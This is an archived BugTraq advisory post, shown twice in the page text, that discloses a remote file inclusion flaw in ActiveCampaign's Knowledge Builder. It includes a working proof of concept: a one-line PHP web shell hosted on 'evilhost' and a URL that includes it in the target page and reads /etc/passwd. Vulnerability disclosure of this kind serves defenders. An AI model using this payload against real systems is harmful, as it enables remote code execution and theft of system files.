BugTraq
Back to list
|
Post reply
Remote Code Execution in Knowledge Builder.
Dec 24 2003 01:45PM
Zero_X www.lobnan.de Team (zero-x linuxmail org)
Remote Code Execution in Knowledge Builder.
"Knowledge Builder" from www.activecampaign.com allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Remote Code Execution in Knowledge Builder.
"Knowledge Builder" from www.activecampaign.com allows to execute code.
Example:
Create the following file on your webserver:
----index.php----
<?
system($cmd);
?>
-----------------
And then type in the following URL:
http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat /etc/passwd
Zero X, member of www.lobnan.de and www.lostkey.org
[ reply ]